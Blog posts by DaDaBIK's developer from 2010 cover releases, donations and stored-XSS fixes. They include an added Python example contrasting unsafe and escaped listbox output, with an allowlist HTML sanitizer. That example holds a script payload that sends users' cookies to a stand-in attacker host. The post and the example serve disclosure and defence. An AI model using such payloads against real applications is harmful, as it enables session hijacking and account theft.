Blog

4.3 rc1 is out, new admin section, last security patch, PLEASE UPGRADE!

Posted by Eugenio on 23 Nov 2010

Hi all,
the version 4.3 release candidate 1 is out; I think it's a milestone in the DaDaBIK road map: many bugs fixed and a new admin section. I hope the 4.3 final release will be available soon, but the idea is to come out with something that can produce applications very close to enterprise-level quality without coding, so I want to wait for your feedback on this rc1.

On the security side, DaDaBIK 4.3 beta3, in a case-sensitive environment, didn't include the htmLawed library; this left DaDaBIK exposed to the security risk that version 4.3 beta3 was supposed to fix. The problem is now solved, and another (potential) security problem has also been fixed, as you can see from the changelog (where you can find the complete list of changes and bug fixes for version 4.3 rc1). So you really need to upgrade!

The new admin section took a lot of work: new look, some improvements in the interface, in-line help for the interface configurator, and the possibility to send feedback, to donate and to buy email/phone commercial support. The configuration file has been improved in clarity too.
Furthermore, the documentation has been completely revised, clarifying some aspects where needed and highlighting some new known bugs/limitations.

A completely new demo is also available; it's an enterprise-oriented application: a simplified invoicing system.

Donations: I'm very happy to see that, just during the last 15 days, 33 people decided to give some money to the project. But it's still a very small fraction of all the people who download DaDaBIK (a lot), and it's not enough to dedicate a fixed amount of time to the project like I'm doing at the moment. Please have a look at other commercial software similar to DaDaBIK, then come back here and think about whether it's fair or not to donate some euros if you use DaDaBIK, considering the plus of having the source code available.

My road map (an update soon in the section) is quite clear now: a couple of 4.x releases which will fix some bugs and/or introduce some small new features and try to enlarge the user base by introducing support for SQLite, IBM DB2 and (maybe) Microsoft Access, then (in 6/7 months) a version 5.0 which will come out with (maybe) some code refactoring but first of all with a completely new security/permission infrastructure with high granularity: the possibility to allow the user John to see just some fields of a table, for example.
In order to follow the road map I need to be economically supported; this is the way to allow DaDaBIK to survive. If a company would like to sponsor the development of some new features (according to the company's and the project's needs), it would also be very welcome.

Ciao,

DaDaBIK description in German and Spanish

Posted by Eugenio on 22 Nov 2010

We now have a description of what DaDaBIK is in Spanish and German as well.
Thanks a lot to my friends Juan García and
Georgi Kobilarov!

I want to seize the moment to leave you a couple of links to visit: http://www.solidarybikes.org, a charity and "green" initiative by Juan and a friend of his; http://uberblic.com, the research & development company founded by Georgi, which works mainly on data integration and linked data.

Ciao,

Security Risk, second patch. PLEASE UPGRADE!

Posted by Eugenio on 15 Nov 2010

Hi all,
a new beta version (DaDaBIK 4.3 beta3) has been released in order to solve the second problem I posted about a few days ago, the one related to the use of the html content type. First of all, it is better to highlight that the problem could arise not only with the html content type but also with the rich_editor field type (together with a content type other than html); I think the rich_editor is usually used together with the html content type (it should be), but maybe someone used it in conjunction with other content types.

After having looked at some HTML sanitization libraries, I finally chose htmLawed. It seems to me that at the moment htmlpurifier is the most effective one at recognizing malicious code, but it appears to me too complex and heavy, and it also doesn't support PHP 4. htmLawed seems a good compromise.

The library is now used to filter the content (html content type and rich_editor field type) before displaying it. You must however keep in mind that, as the documentation states, there are some minor cases in which htmLawed can fail.
Since some people asked me about previous releases, as I already said in a comment, the security issues highlighted during the last days also affect the older releases of DaDaBIK, not just the last one.

See the changelog for other details. The documentation has also been updated; if you read the on-line documentation this morning, there was a mistake about which version it related to: the documentation content was the new one (related to 4.3 beta3, already patched with htmLawed) but it stated that it was about 4.3 beta2 (which is not patched with htmLawed), so be sure to read the right one (the on-line mistake has now been corrected) in order to avoid misunderstandings about the security problems that affect your version.

Ciao,

Security Risk, PLEASE UPGRADE!

Posted by Eugenio on 11 Nov 2010

Hi all,
last night I discovered an important security hole in DaDaBIK, so I decided to immediately release a version 4.3 beta2 with the only purpose of partially fixing it. All the other bug fixes and new features are waiting for the version 4.3 rc1, available in 1 or 2 weeks as expected.

Here is the problem: if in a DaDaBIK application the insert or edit feature was enabled (at least for one table) and a select_single field type was used (at least once, even in another table), a malicious user who had access to the application could in many cases insert into a listbox some arbitrary javascript code, which was then executed by other users just by using the application.
Among other problems, this could lead to XSS attacks (http://en.wikipedia.org/wiki/Cross-site_scripting), which in turn could allow unauthorized access to the application (http://en.wikipedia.org/wiki/Session_hijacking) and, if the user's Internet browser contained security holes, even the execution of arbitrary code on the client machine.

The new 4.3 beta2 solves this problem. Even the DaDaBIK demo was affected and exploited by a malicious user; now it has been patched.

The problems described above can however occur even when the insert or edit feature is enabled (at least for one table) and the HTML content type is used; at the moment there isn't a patch for this second scenario, so the HTML content type should be used very carefully, as highlighted in the updated documentation. In the next few days, I would like to use something like http://htmlpurifier.org to allow the users to insert html text without security problems.
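The two scenarios in this post differ in the fix they admit, and the following is an added example (not DaDaBIK's code, and not htmLawed, which the 15 Nov post above says the project adopted) that shows why. A select_single label is plain text, so output encoding is enough: once `<`, `>`, `"` and `&` are turned into entities, a stored `</option><script>` payload is rendered as literal text. A value of the html content type is meant to contain markup, so encoding would destroy it; there the value has to be sanitized against an allowlist of tags and attributes, dropping script/style blocks, event handlers and javascript: URLs. The example is written in Python for a self-contained illustration (DaDaBIK itself is PHP); the payload strings, the allowlist and the function names are constructed for the demonstration.

```python
"""Added example (not DaDaBIK code): listbox output encoding vs. HTML sanitization.

Field values are assumed to come back from the database exactly as a user stored
them; the payloads below are constructed for the demonstration.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed payload of the kind described for select_single: it closes the
# <option> and drops a <script> into the page that every other user renders.
STORED_LABEL = '</option><script>location="http://evil.example/?"+document.cookie</script>'


def render_option_unsafe(value: str) -> str:
    """The vulnerable pattern: the stored label is echoed verbatim into the listbox."""
    return f'<option value="{value}">{value}</option>'


def render_option_safe(value: str) -> str:
    """Output encoding: < > & " ' become entities, so the browser sees text, not tags."""
    e = html.escape(value, quote=True)
    return f'<option value="{e}">{e}</option>'


# For the html content type the value is *meant* to contain markup, so escaping
# would destroy it; it has to be sanitized instead. Minimal allowlist sanitizer
# written for this example (constructed allowlist; not htmLawed).
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "ul": set(), "ol": set(), "li": set(), "a": {"href"},
}
VOID = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []   # emitted tags still open, so output stays well-formed
        self.skip = 0    # >0 while inside <script>/<style>: their text is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED:
            return       # unknown tag dropped; its text content is kept (escaped)
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # drops every on* handler, style, id, etc.
            if name == "href":
                scheme = urlparse(value.strip()).scheme.lower()
                if scheme and scheme not in SAFE_SCHEMES:
                    continue  # javascript:, data:, vbscript: ...
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            if self.skip:
                self.skip -= 1
            return
        if self.skip or tag not in self.open:
            return
        while self.open:  # close back to the matching tag
            t = self.open.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        while self.open:  # close anything the input left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_html(fragment: str) -> str:
    s = AllowlistSanitizer()
    s.feed(fragment)
    s.close()
    return s.result()


if __name__ == "__main__":
    print(render_option_unsafe(STORED_LABEL))   # script tag lands in the page
    print(render_option_safe(STORED_LABEL))     # same payload, now inert text
    print(sanitize_html('<p onclick="x()">hi <script>alert(1)</script><b>there</b></p>'))
```

The two functions map onto the two scenarios of the post: `render_option_safe` is what a select_single listbox needs, and `sanitize_html` is the kind of filtering an html content type needs before display. A sanitizer like this one (or htmLawed) can still miss edge cases, as the later post acknowledges, which is why the HTML content type warrants more care than plain fields.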

The 4.3 beta2 also fixes another minor GUI bug, as you can read from the changelog.

Ciao,

Is DaDaBIK still used with non-MySQL DBMSs?

Posted by Eugenio on 9 Nov 2010

Starting with the last 4.3 beta, users can register their installation of DaDaBIK; I receive information about DBMS type and DaDaBIK version.
97 installations have been registered so far and these are the statistics about the DBMSs usage:
MySQL: 95 installations
PostgreSQL: 2 installations
Oracle: 0 installations
MS SQL Server: 0 installations

97 is (statistically) still a small number, but I'm wondering if DaDaBIK is still used with non-MySQL DBMSs... maybe the typical Oracle or MS SQL Server user doesn't work much with PHP, but I think that's not true for a PostgreSQL user.

I decided to dedicate some time in the future to testing DaDaBIK with other DBMSs (SQLite and DB2), but if everybody's using MySQL I don't know if it's still a good idea.
